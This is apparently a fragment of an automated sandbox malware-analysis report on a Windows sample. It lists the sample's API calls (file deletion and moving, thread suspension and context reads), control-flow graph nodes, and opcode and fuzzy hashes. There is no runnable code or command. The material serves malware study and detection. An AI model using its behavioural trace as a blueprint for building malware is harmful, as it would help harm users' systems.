                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$File$AttributesMessageSend_wcscat_wcscpy$DeleteH_prologItem_memset_realloc_wcsrchr
                                                                                                                • String ID: "$%s.%d.tmp$<br>$C:\Users\user\AppData\Roaming$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\
                                                                                                                • API String ID: 1677619958-75030017
                                                                                                                • Opcode ID: 8dbb4f1cd464f17588d91b3678b8e53e81d4e5a4485536f2209b7b2cb35c768c
                                                                                                                • Instruction ID: eb6df92c66f9458d4cb09cc0b8b2cf72f8974dad3a9eab0123ee51dd3de86d7f
                                                                                                                • Opcode Fuzzy Hash: 8dbb4f1cd464f17588d91b3678b8e53e81d4e5a4485536f2209b7b2cb35c768c
                                                                                                                • Instruction Fuzzy Hash: D9E141B1800259AADF20EB91DC45BEE7778BF04344F0448BBF605B31D1EB789A99CB58

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(00000068,00000000), ref: 0040CFBB
                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,?,?,0040DFB1,00426854,004480E0,004480E0,00001000,?,00000000,?), ref: 0040CFE8
                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0040CFF4
                                                                                                                • SendMessageW.USER32(00000000,000000C2,00000000,00426554), ref: 0040D003
                                                                                                                • SendMessageW.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040D017
                                                                                                                • SendMessageW.USER32(?,0000043A,00000000,?), ref: 0040D02E
                                                                                                                • SendMessageW.USER32(?,00000444,00000001,0000005C), ref: 0040D069
                                                                                                                • SendMessageW.USER32(?,000000C2,00000000,?), ref: 0040D078
                                                                                                                • SendMessageW.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040D080
                                                                                                                • SendMessageW.USER32(?,00000444,00000001,0000005C), ref: 0040D0A4
                                                                                                                • SendMessageW.USER32(?,000000C2,00000000,0042681C), ref: 0040D0B5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ItemShowWindow
                                                                                                                • String ID: \
                                                                                                                • API String ID: 1207805008-2967466578
                                                                                                                • Opcode ID: 30376d48d85cc97e7a7770a64de7a32e446cc6ba43c6729db23d4082a341df7f
                                                                                                                • Instruction ID: f7650883e2410028dd2462a2b3370e1b98169fb48f2bdcd5e5cef2d2a29d4cbf
                                                                                                                • Opcode Fuzzy Hash: 30376d48d85cc97e7a7770a64de7a32e446cc6ba43c6729db23d4082a341df7f
                                                                                                                • Instruction Fuzzy Hash: A5319FB1E4025CBAEB219BA1DC4AFAE7F79EB81714F204169F214BA1E0C7B51D01DF58

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 480 40b8d9-40b904 call 419784 call 419e00 call 41bd9c 487 40b906-40b926 call 4d88f8 call 41bdc2 480->487 488 40b92f-40b961 call 419acb call 408713 call 408750 480->488 497 40bbb5-40bbc1 487->497 498 40b92c 487->498 501 40b963-40b972 call 408bcf 488->501 502 40b977-40b981 488->502 498->488 510 40bbb4 501->510 503 40b982-40b986 502->503 505 40baa3-40baca call 408f44 call 41c2de 503->505 506 40b98c-40b992 call 408b00 503->506 517 40bad0-40bae2 call 408dd2 505->517 518 40bbaa-40bbb3 call 408bcf 505->518 512 40b997-40b9bb call 408dd2 506->512 510->497 519 40b9c1-40b9cb 512->519 520 40ba6f-40ba93 call 408f44 512->520 534 40bae4-40bae9 517->534 535 40baeb-40bafa call 41c2de 517->535 518->510 523 40b9f2-40b9f6 519->523 524 40b9cd-40b9d5 519->524 520->503 538 40ba99-40ba9d 520->538 529 40ba24-40ba27 523->529 530 40b9f8-40ba04 523->530 524->523 528 40b9d7-40b9f0 call 41c3a8 524->528 528->523 550 40ba67-40ba6c 528->550 532 40ba52-40ba5b 529->532 533 40ba29-40ba31 529->533 530->529 537 40ba06-40ba0e 530->537 532->519 540 40ba61 532->540 533->532 539 40ba33-40ba4c call 41c3a8 533->539 541 40bb20-40bb2a 534->541 545 40bba4 535->545 556 40bb00-40bb1e call 411228 call 4197a3 535->556 537->529 544 40ba10-40ba22 call 41bc49 537->544 538->505 538->545 539->532 539->545 540->520 546 40bb2c 541->546 547 40bb2e-40bb3b 541->547 544->529 557 40ba63 544->557 545->518 546->547 553 40bb99-40bba1 547->553 554 40bb3d-40bb47 547->554 550->520 553->545 554->553 558 40bb49-40bb4d 554->558 556->541 557->550 560 40bb80-40bb84 558->560 561 40bb4f-40bb56 558->561 563 40bb86-40bb8a 560->563 564 40bb8c 560->564 565 40bb58-40bb5b 561->565 566 40bb7b 561->566 563->564 568 40bb8f-40bb97 563->568 569 40bb8e 564->569 570 40bb77-40bb79 565->570 571 40bb5d-40bb60 565->571 572 40bb7d-40bb7e 566->572 568->553 568->554 569->568 570->572 574 40bb62-40bb65 571->574 575 40bb73-40bb75 571->575 572->569 576 40bb67-40bb69 574->576 577 40bb6f-40bb71 574->577 575->572 576->568 578 40bb6b-40bb6d 576->578 577->572 578->572
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _malloc_strncmp$ErrorH_prologLast_wcschr_wcscpy_wcsrchr
                                                                                                                • String ID: *messages***$*messages***$a
                                                                                                                • API String ID: 1282893500-1639468518
                                                                                                                • Opcode ID: 3914abc9277c311b581f1b3b7c9b5ba6f605ed2e35b78b3275249a2a30594faa
                                                                                                                • Instruction ID: 09ad2670b8bc28ceb4fbae69c622eeb1207a7e22057d47210ddbd4b38e916631
                                                                                                                • Opcode Fuzzy Hash: 3914abc9277c311b581f1b3b7c9b5ba6f605ed2e35b78b3275249a2a30594faa
                                                                                                                • Instruction Fuzzy Hash: 8D81F0B1A002059BDB24EB64CC81FAA77B4EF10354F10417FE695B72D5DB78AA84CA8D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 666 41cb5a-41cb87 call 41ed5c call 4c9fdc 671 41cbc1 666->671 672 41cb89-41cb98 666->672 673 41cbc4-41cbd0 call 41e0b7 671->673 672->671 674 41cb9a-41cba6 672->674 679 41cbd2-41cbd9 call 41cb31 673->679 680 41cbda-41cbe1 call 41ddba 673->680 674->671 676 41cba8-41cbaf 674->676 676->671 677 41cbb1-41cbbf 676->677 677->673 679->680 685 41cbe3-41cbea call 41cb31 680->685 686 41cbeb-41cbfa call 422529 call 4222d5 680->686 685->686 693 41cc04-41cc20 call 466378 call 42219e call 4220e3 686->693 694 41cbfc-41cc03 call 420456 686->694 703 41cc22-41cc29 call 420456 693->703 704 41cc2a-41cc31 call 421e6b 693->704 694->693 703->704 709 41cc33-41cc3a call 420456 704->709 710 41cc3b-41cc44 call 420515 704->710 709->710 715 41cc46-41cc4c call 420456 710->715 716 41cc4d-41cc55 call 421e0c 710->716 715->716 721 41cc57-41cc5b 716->721 722 41cc5d-41cc5f 716->722 723 41cc60-41cc73 call 40fbd4 721->723 722->723 726 41cc75-41cc76 call 4206c6 723->726 727 41cc7b-41ccd7 call 4206f2 call 41eda1 723->727 726->727
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __amsg_exit$_fast_error_exit$EnvironmentInitializeStrings___crt__cinit__setenvp__wincmdln
                                                                                                                • String ID:
                                                                                                                • API String ID: 4269402829-0
                                                                                                                • Opcode ID: f91dcd0fd42e64313f3fba2d0419506ea4ba2f1cd06083854035faa7acef6fac
                                                                                                                • Instruction ID: 883fb3c980f4813e5c436b5cf12726f04a294531e72352cfac5452c5fc103bbc
                                                                                                                • Opcode Fuzzy Hash: f91dcd0fd42e64313f3fba2d0419506ea4ba2f1cd06083854035faa7acef6fac
                                                                                                                • Instruction Fuzzy Hash: 1E31CD71A8431499DB2477B2BD87BEE66B45F10718F10441FF505AB1C2EABC9DC08B5D
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00407484
                                                                                                                  • Part of subcall function 004181AF: _wcscpy.LIBCMT ref: 004182A1
                                                                                                                • _memcmp.LIBCMT ref: 00407A2D
                                                                                                                  • Part of subcall function 0040C05E: LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0AF
                                                                                                                  • Part of subcall function 0040C05E: LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0C1
                                                                                                                  • Part of subcall function 0040DF6E: GetLastError.KERNEL32(?,0042E76C,004063D7,00000000,%ls,?,?,00000400,?,00000000,?), ref: 0040DF83
                                                                                                                  • Part of subcall function 0040DF6E: __vswprintf_c_l.LIBCMT ref: 0040DFA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString$ErrorH_prologLast__vswprintf_c_l_memcmp_wcscpy
                                                                                                                • String ID: E$lB$lB$lB$lB$lB$lB
                                                                                                                • API String ID: 1502584966-2948937983
                                                                                                                • Opcode ID: 91022f5f61e587b8289916d826e93972d45bc65a3e7724069360aa181ab8e7af
                                                                                                                • Instruction ID: fd818395ae649b4659bce74796ff2bdd81b87cfc9f7dd8f50251040ea6006d7f
                                                                                                                • Opcode Fuzzy Hash: 91022f5f61e587b8289916d826e93972d45bc65a3e7724069360aa181ab8e7af
                                                                                                                • Instruction Fuzzy Hash: 3B62E970D08645ADEF25DF64C8447EB7BE59F01304F0881BFE9496A2C2C77D6A88C76A

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1037 40ed89-40ed8d 1038 40ed93-40edae call 41c605 1037->1038 1039 40f0cc-40f0f2 call 40d454 1037->1039 1044 40edb0-40edb9 1038->1044 1045 40ede3-40edf4 call 410823 1038->1045 1046 40e570-40e58a 1039->1046 1047 40f0f8-40f106 1039->1047 1048 40edbb-40edcd call 410823 1044->1048 1049 40edcf-40ede1 call 410823 1044->1049 1060 40edfb-40ee28 call 419acb 1045->1060 1051 40e591-40e5a4 call 40d98b 1046->1051 1048->1060 1049->1060 1061 40e5a6 1051->1061 1065 40ee72-40ee80 call 4091fc 1060->1065 1066 40ee2a-40ee50 call 419acb call 41bd9c 1060->1066 1063 40e5aa-40e5c2 call 41154c 1061->1063 1073 40e5d2-40e5d6 1063->1073 1074 40e5c4-40e5cb 1063->1074 1077 40ee86-40ee98 1065->1077 1078 40ef18-40ef21 1065->1078 1066->1078 1091 40ee56-40ee6d call 419acb 1066->1091 1073->1039 1075 40e5dc-40e5df 1073->1075 1074->1063 1079 40e5cd 1074->1079 1080 40e5e6-40e5ea 1075->1080 1081 40e7cd-40e7d1 1075->1081 1082 40e88e-40e892 1075->1082 1083 40e86f-40e873 1075->1083 1077->1078 1085 40ee9a-40eea1 1077->1085 1086 40ef23-40ef32 call 40a75f 1078->1086 1087 40ef37-40ef52 call 40a75f 1078->1087 1079->1039 1080->1039 1089 40e5f0-40e65a call 419298 call 409ea3 call 409376 call 40939f call 406528 call 409551 1080->1089 1081->1039 1093 40e7d7-40e7e6 1081->1093 1082->1039 1092 40e898-40e8a0 1082->1092 1083->1039 1090 40e879-40e889 call 4e8e64 1083->1090 1094 40eea3-40eea7 1085->1094 1095 40eea9-40eebf call 4091fc 1085->1095 1086->1087 1107 40ef63-40ef77 call 409e73 1087->1107 1108 40ef54-40ef5e call 40cdba 1087->1108 1194 40e660 1089->1194 1195 40e7b9-40e7c8 call 40938c 1089->1195 1090->1039 1091->1078 1092->1039 1101 40e8a6-40e8c0 1092->1101 1102 40e7f5-40e7f9 1093->1102 1103 40e7e8-40e7f4 call 419a9d 1093->1103 1094->1095 1104 40ef02-40ef08 1094->1104 1118 40eec1-40eec8 1095->1118 1119 40eeff 1095->1119 1112 40e8c2-40e8c8 1101->1112 1113 40e8cb-40e8d4 call 419a83 1101->1113 1116 40e803-40e80b call 40d600 1102->1116 1117 40e7fb-40e801 1102->1117 1103->1102 1104->1085 1115 40ef0a-40ef0e 1104->1115 1140 40ef79-40ef95 call 410850 call 409e73 1107->1140 1141 40ef9a-40efbc call 419acb 1107->1141 1108->1107 1112->1113 1113->1039 1143 40e8da-40e8e1 1113->1143 1115->1078 1125 40ef10-40ef15 1115->1125 1126 40e80d-40e811 1116->1126 1117->1126 1129 40eee0-40eee6 1118->1129 1130 40eeca-40eede 1118->1130 1119->1104 1125->1078 1131 40e813-40e815 1126->1131 1132 40e817-40e823 call 419a83 1126->1132 1129->1129 1138 40eee8-40eee9 1129->1138 1136 40eeef-40eefd call 419acb 1130->1136 1137 40e825-40e849 call 419a83 call 419831 1131->1137 1132->1137 1136->1104 1177 40e850-40e85d call 419a9d 1137->1177 1178 40e84b-40e84d 1137->1178 1138->1136 1140->1141 1167 40efc4-40efe6 call 40a11f call 410850 call 40a2ae 1141->1167 1168 40efbe 1141->1168 1150 40e8e3-40e8e8 1143->1150 1151 40e8fd-40e901 1143->1151 1150->1151 1159 40e8ea-40e8f1 1150->1159 1152 40e9e2 1151->1152 1153 40e907-40e90a 1151->1153 1166 40e9e3-40e9ea call 419acb 1152->1166 1161 40e917-40e931 call 4d7bd8 1153->1161 1162 40e90c-40e911 1153->1162 1159->1039 1160 40e8f7-40e8f8 1159->1160 1160->1166 1182 40e933-40e96d call 471e1c call 4d3f54 1161->1182 1183 40e97c-40e984 1161->1183 1162->1152 1162->1161 1174 40e9ef-40e9f0 1166->1174 1216 40eff7-40f004 call 410850 1167->1216 1217 40efe8-40eff5 call 41154c 1167->1217 1168->1167 1180 40e9f1-40ea03 call 41bdc2 1174->1180 1177->1039 1200 40e863-40e86a call 4197a3 1177->1200 1178->1177 1204 40ea11-40ea5f call 419acb call 40d7e9 GetDlgItem call 4e8e64 SendMessageW call 419a4c 1180->1204 1205 40ea05-40ea0a 1180->1205 1229 40e972-40e974 1182->1229 1230 40e96f 1182->1230 1190 40e9b1-40e9cf call 419a83 * 2 1183->1190 1191 40e986-40e99c call 419a83 1183->1191 1190->1180 1237 40e9d1-40e9e0 call 419a9d 1190->1237 1191->1190 1211 40e99e-40e9b0 call 419a9d 1191->1211 1203 40e665-40e67b SetFileAttributesW 1194->1203 1195->1039 1200->1039 1212 40e681-40e6b5 call 40a544 call 409e73 call 419a83 1203->1212 1213 40e723-40e72f GetFileAttributesW 1203->1213 1263 40ea64-40ea68 1204->1263 1205->1204 1214 40ea0c-40ea0e 1205->1214 1211->1190 1260 40e6b7-40e6c7 call 419a83 1212->1260 1261 40e6c9-40e6d7 call 409e2d 1212->1261 1223 40e731-40e740 DeleteFileW 1213->1223 1224 40e79d-40e7b3 call 409551 1213->1224 1214->1204 1238 40f009-40f0a5 call 4092a1 call 419acb call 40a337 call 4191ad 1216->1238 1217->1216 1217->1238 1223->1224 1234 40e742-40e746 1223->1234 1224->1195 1224->1203 1229->1183 1230->1229 1241 40e74e-40e772 call 40b8bd GetFileAttributesW 1234->1241 1237->1174 1238->1039 1276 40f0a7-40f0b7 call 4582b8 1238->1276 1255 40e774-40e78a MoveFileW 1241->1255 1256 40e748-40e74b 1241->1256 1255->1224 1262 40e78c-40e79c call 4e7ae4 1255->1262 1256->1241 1260->1261 1274 40e6dd-40e722 call 419a83 call 419b00 call 46fd0c 1260->1274 1261->1195 1261->1274 1262->1224 1263->1039 1268 40ea6e-40ea83 SendMessageW 1263->1268 1268->1039 1274->1213 1280 40f0bc-40f0bd 1276->1280 1280->1039
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$_wcschr_wcsncpy
                                                                                                                • String ID: "$.lnk
                                                                                                                • API String ID: 1398637911-4024015082
                                                                                                                • Opcode ID: f89d43da02553aa40f8154c18aabd13592f85f0ea484d7a09cca45d8928ed449
                                                                                                                • Instruction ID: cda6ec5b1dd6c0b3a399dff9c64bd740c8c36fdf19c023657f117b40d275632f
                                                                                                                • Opcode Fuzzy Hash: f89d43da02553aa40f8154c18aabd13592f85f0ea484d7a09cca45d8928ed449
                                                                                                                • Instruction Fuzzy Hash: 4491437280022D99DF25EB91CC45EEE73BCBF44304F0405ABE209F7181EB789AD48B99

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1284 40e139-40e14f call 419e00 1287 40e155-40e161 call 419a83 1284->1287 1288 40e399-40e39c 1284->1288 1287->1288 1291 40e167-40e18a call 419b00 1287->1291 1294 40e194 1291->1294 1295 40e18c-40e192 1291->1295 1296 40e197-40e19c 1294->1296 1295->1296 1297 40e1ed-40e1f0 1296->1297 1298 40e19e 1296->1298 1299 40e1f2-40e1f5 1297->1299 1300 40e207-40e21b call 40a2ae 1297->1300 1301 40e1a0-40e1a4 1298->1301 1299->1300 1302 40e1f7-40e1fe 1299->1302 1316 40e233-40e23f call 4091fc 1300->1316 1317 40e21d-40e22a call 41154c 1300->1317 1303 40e1a6 1301->1303 1304 40e1bf-40e1c4 1301->1304 1302->1300 1308 40e200 1302->1308 1309 40e1af-40e1b4 1303->1309 1306 40e1c6-40e1cc 1304->1306 1307 40e1d9-40e1e0 1304->1307 1306->1307 1311 40e1ce-40e1d5 1306->1311 1312 40e1e2-40e1e4 1307->1312 1313 40e1e7-40e1ea 1307->1313 1308->1300 1314 40e1b6 1309->1314 1315 40e1a8-40e1ad 1309->1315 1311->1301 1318 40e1d7 1311->1318 1312->1313 1313->1297 1314->1304 1315->1309 1320 40e1b8-40e1bb 1315->1320 1325 40e241-40e25b call 40a75f 1316->1325 1326 40e25e-40e267 1316->1326 1317->1316 1324 40e22c 1317->1324 1318->1297 1320->1304 1324->1316 1325->1326 1328 40e2a0-40e2a4 call 44dc7c 1326->1328 1329 40e269-40e26b 1326->1329 1333 40e2a9-40e2ac 1328->1333 1329->1328 1332 40e26d-40e29a call 419acb call 419a9d call 4091fc 1329->1332 1332->1328 1336 40e398 1332->1336 1335 40e2b2-40e2c8 1333->1335 1333->1336 1338 40e2d9-40e2dd 1335->1338 1339 40e2ca-40e2ce 1335->1339 1336->1288 1342 40e2f7-40e314 call 452924 call 40d52a 1338->1342 1343 40e2df-40e2ea call 46c014 1338->1343 1339->1338 1341 40e2d0-40e2d7 1339->1341 1341->1338 1345 40e339-40e346 CloseHandle 1341->1345 1342->1345 1363 40e316-40e325 call 45f06c 1342->1363 1343->1342 1357 40e2ec-40e2f3 ShowWindow 1343->1357 1349 40e355-40e35c 1345->1349 1350 40e348-40e353 call 41154c 1345->1350 1355 40e370-40e380 1349->1355 1356 40e35e-40e362 1349->1356 1350->1349 1361 40e385-40e389 1350->1361 1355->1361 1356->1355 1360 40e364-40e36e 1356->1360 1357->1342 1360->1361 1361->1336 1364 40e38b-40e38f 1361->1364 1363->1345 1368 40e327-40e332 1363->1368 1364->1336 1366 40e391-40e396 ShowWindow 1364->1366 1366->1336 1368->1345 1369 40e334 1368->1369 1369->1345
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 0040E156
                                                                                                                • _memset.LIBCMT ref: 0040E171
                                                                                                                • _wcscpy.LIBCMT ref: 0040E277
                                                                                                                • _wcscat.LIBCMT ref: 0040E284
                                                                                                                • ShowWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 0040E2F1
                                                                                                                • CloseHandle.KERNEL32(?,?,000007D0,?,?,?), ref: 0040E33C
                                                                                                                • ShowWindow.USER32(00000000,00000001), ref: 0040E396
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow$CloseHandle_memset_wcscat_wcscpy_wcslen
                                                                                                                • String ID: .exe$.inf
                                                                                                                • API String ID: 432946620-3750412487
                                                                                                                • Opcode ID: 194fad1b06da3ecb32decb044404a10563abff4bab8ac6c38c74bf44d86ea1d4
                                                                                                                • Instruction ID: c3944ab9c1e47af241af76b9de23f276a32abf7a3753ac83168d7aa016d66a71
                                                                                                                • Opcode Fuzzy Hash: 194fad1b06da3ecb32decb044404a10563abff4bab8ac6c38c74bf44d86ea1d4
                                                                                                                • Instruction Fuzzy Hash: 2C61C571900358AAEF21ABA6D8447AE7BB8AF41304F04487FE941B72E1D77D49A5CB48

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1370 2291ba9-2291bd4 OpenThread 1371 2291c43-2291c52 call 229f2be 1370->1371 1372 2291bd6-2291bd8 1370->1372 1372->1371 1373 2291bda-2291be4 Wow64SuspendThread 1372->1373 1375 2291c3a-2291c41 CloseHandle 1373->1375 1376 2291be6-2291bf2 1373->1376 1375->1371 1378 2291c26-2291c36 Wow64GetThreadContext 1376->1378 1379 2291c38 1378->1379 1380 2291bf4-2291bfd 1378->1380 1379->1371 1380->1371 1381 2291bff-2291c08 1380->1381 1381->1371 1382 2291c0a-2291c14 ResumeThread 1381->1382 1382->1375 1383 2291c16-2291c25 Sleep SuspendThread 1382->1383 1383->1378
                                                                                                                APIs
                                                                                                                • OpenThread.KERNEL32(001FFFFF,00000000,?,00000000,?), ref: 02291BC9
                                                                                                                • Wow64SuspendThread.KERNEL32(00000000), ref: 02291BDB
                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 02291C0B
                                                                                                                • Sleep.KERNEL32(00000064), ref: 02291C18
                                                                                                                • SuspendThread.KERNEL32(00000000), ref: 02291C1F
                                                                                                                • Wow64GetThreadContext.KERNEL32(00000000,00010001), ref: 02291C2E
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02291C3B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$SuspendWow64$CloseContextHandleOpenResumeSleep
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 151076144-2496334608
                                                                                                                • Opcode ID: 1cced7e78016f8efb38b6fd067d1112067d9c369acabe07c3d34fa697e2de684
                                                                                                                • Instruction ID: 1a22e4eb9fccf5a0f288906f7424abbd24c4c6960b6d3b0f8f271b27c56e1d80
                                                                                                                • Opcode Fuzzy Hash: 1cced7e78016f8efb38b6fd067d1112067d9c369acabe07c3d34fa697e2de684
                                                                                                                • Instruction Fuzzy Hash: 1111E231E4062AABCB01DFE5EC8C7A973A8AF04725F000A90E819D2180D7708A61CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
